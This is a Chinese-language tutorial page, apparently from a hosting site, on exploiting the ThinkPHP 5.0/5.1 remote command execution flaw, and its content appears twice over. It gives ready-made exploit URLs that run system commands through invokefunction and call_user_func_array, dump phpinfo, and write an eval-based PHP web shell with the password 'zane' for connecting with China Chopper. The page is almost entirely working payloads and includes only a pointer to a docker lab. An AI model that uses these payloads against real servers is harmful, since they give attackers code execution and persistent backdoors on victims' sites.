关于ThinkPHP漏洞利用
发布时间:2025-09-25 点击:5
下面由thinkphp框架教程栏目给大家介绍thinkphp 漏洞利用,希望对需要的朋友有所帮助!
thinkphp_5x_命令执行漏洞
受影响版本包括5.0和5.1版本
docker漏洞环境源码:
https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15 php5.6n apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html
利用system函数远程命令执行
exp
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\\\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
通过phpinfo函数写出phpinfo()信息
exp:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入shell
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_post["zane"])?^>>shell.php或者http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=fuck<?php @eval($_post["zane"])?>使用菜刀连接
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane
http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane
`
香港主机选择
注册域名去哪家平台比较好 域名注册平台应该怎么选
2017京东3C双11同比增幅200%
武汉高防云服务器托管
手机端数据库报错-虚拟主机/数据库问题
php 数组值如何反转
bluehost SSD VPS 新品上市,“最具性价比”能否让其脱颖而出
电脑中无法在IE浏览器窗口之间拖动复制内容怎么解决
thinkphp_5x_命令执行漏洞
受影响版本包括5.0和5.1版本
docker漏洞环境源码:
https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15 php5.6n apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html
利用system函数远程命令执行
exp
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\\\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
通过phpinfo函数写出phpinfo()信息
exp:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入shell
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_post["zane"])?^>>shell.php或者http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\\\think\\\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=fuck<?php @eval($_post["zane"])?>使用菜刀连接
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane
http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane
`
香港主机选择
注册域名去哪家平台比较好 域名注册平台应该怎么选
2017京东3C双11同比增幅200%
武汉高防云服务器托管
手机端数据库报错-虚拟主机/数据库问题
php 数组值如何反转
bluehost SSD VPS 新品上市,“最具性价比”能否让其脱颖而出
电脑中无法在IE浏览器窗口之间拖动复制内容怎么解决